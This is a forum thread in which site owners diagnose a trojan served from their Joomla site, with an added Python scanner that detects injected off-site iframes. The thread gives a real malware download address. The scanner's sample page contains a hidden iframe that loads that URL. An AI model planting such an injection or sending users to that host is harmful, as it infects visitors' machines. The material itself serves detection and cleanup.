Full Version: Xplad.v Infection
Terje
Recently bytezandpieces.com has contracted a virus of the trojan variety. I'm not sure how it got it, but it certainly has a trojan of some kind. I couldn't find much in the way of information on it, save for that it tries to load a .wmv. AVG picks it up before it causes too much trouble. Also, it usually crashes IE. Any advice on how to clear this up?
stevevan
Have you googled the trojan's name?

Oh...and welcome to the forums!
TCH-Bruce
Welcome to the forums.

Are you sure of the spelling? I've searched several databases and have found nothing on Xplad.v
TCH-Thomas
Welcome to the forum, Terje.

I searched a bit and did not find the exact name you are saying but I found info on some with similar names.

See if these help:

http://www.pestpatrol.com/spywarecenter/pest.aspx?id=24731
http://www.pandasoftware.com/com/virus_info/encyclopedia/overview.aspx?idvirus=31604&sitepanda=particulares
sass
I help run bytezandpieces.com, and today while I was fiddling around I noticed that the site is downloading the trojan from the following address: zbzppbwqmm.biz/dl/adv493.php

I also noticed the program "webalizer" in my tmp file and wasn't sure if this was related or not. I am not up on script enough to be able to pick out what on my page is causing me to download from this website, and webalizer is open source so I assume it could be used for good or evil. Any suggestions? Thanks,

Sass
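An added example, not code from the thread: a small scanner that answers Sass's question of what on a page is pulling content from a foreign host. It flags iframe, script, object and embed tags whose src points off-site and sorts them into the host named in the thread versus anything else worth a look; the site host, the sample page and stats.example.net are assumptions.

```python
import re
from typing import Dict, List, Tuple

# Hypothetical scanner (not part of the thread): flags tags that fetch
# content from a host other than the site itself. Hosts are from the thread.
SITE_HOST = "bytezandpieces.com"
KNOWN_BAD = {"zbzppbwqmm.biz"}

# src= or data= on tags that fetch and run or render remote content.
TAG_RE = re.compile(
    r'<(iframe|script|object|embed)\b[^>]*?\b(?:src|data)\s*=\s*["\']?([^"\'\s>]+)',
    re.IGNORECASE)
URL_HOST_RE = re.compile(r'^(?:https?:)?//([^/:?#]+)', re.IGNORECASE)

def ref_host(url: str) -> str:
    """Host part of a URL; '' for relative paths (same-site resources)."""
    m = URL_HOST_RE.match(url)
    if m:
        return m.group(1).lower()
    # Scheme-less "host/path" form, as the address is written in the thread.
    m = re.match(r'^([a-z0-9-]+(?:\.[a-z0-9-]+)+)/', url, re.IGNORECASE)
    return m.group(1).lower() if m else ""

def external_refs(html: str) -> List[Tuple[str, str, str]]:
    """Return (tag, host, url) for each tag loading from a foreign host."""
    out = []
    for tag, url in TAG_RE.findall(html):
        host = ref_host(url)
        if host and host != SITE_HOST and not host.endswith("." + SITE_HOST):
            out.append((tag.lower(), host, url))
    return out

def triage(html: str) -> Dict[str, List[str]]:
    """Split foreign references into known-bad hosts and ones to review."""
    result: Dict[str, List[str]] = {"known_bad": [], "review": []}
    for tag, host, url in external_refs(html):
        bucket = "known_bad" if host in KNOWN_BAD else "review"
        result[bucket].append(f"<{tag}> -> {url}")
    return result

# Constructed sample: a hidden injected iframe beside legitimate content.
SAMPLE_PAGE = """<html><body>
<h1>News</h1>
<script src="/js/news.js"></script>
<iframe src="http://zbzppbwqmm.biz/dl/adv493.php" width=1 height=1
        style="visibility:hidden"></iframe>
<script src="http://stats.example.net/count.js"></script>
</body></html>"""

print(triage(SAMPLE_PAGE))
```

Run it over every .html, .php and template file in the web root; a hit in a file you did not edit (or in the news management system's templates) is the injection point.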
TCH-Bruce
Welcome to the forums Sass

Webalizer is a site statistics script similar to AwStats. This should not be downloading anything.
sass
QUOTE(TCH-Bruce @ Jul 20 2006, 12:46 PM) *
Welcome to the forums Sass

Webalizer is a site statistics script similar to AwStats. This should not be downloading anything.


That's good to know. I still wonder what is telling my site to download the trojan.
sass
Just an update: I found a calling card by someone calling himself "Partizan." He links to the following site:
http://kizil.org/. I wasn't sure if there was a procedure for reporting these guys or what, but I think he is exploiting our news management system. I'm working on it as we speak.

Sass
sass
One more update: the full name of the trojan is xpladv493[1].wmf. I recently saw one other site that it had hit; it isn't very widespread yet, apparently.
stevevan
I just did a Google search and came up with two entries. One of them had to do with Joomla! v 1.0.10 (the latest one). The entry was written in Dutch, but you can bet I'll be paying a little closer attention to the Joomla! web site in the coming month or so!
Madmanmcp
QUOTE
I noticed that the site is downloading the trojan from the following address: zbzppbwqmm.biz/dl/adv493.php


Not sure why you are downloading, but this appears to be a legit site. The whois data on the domain appears to be a real person and all the information "looks" real. When you go to the domain h_tp://zbzppbwqmm.biz/ it brings up a "Fedora Core Test Page".
stevevan
Have a look at this site for some interesting info on this.
TCH-JimE
It looks like the original person on the Joomla website was at 1.0.8, and it may have already been there before they updated to 1.0.10.

If you're still having problems, back up your Joomla website, remove all the files and upload a fresh set.

If you have an up-to-date Windows XP, it should be patched against this flaw.

JimE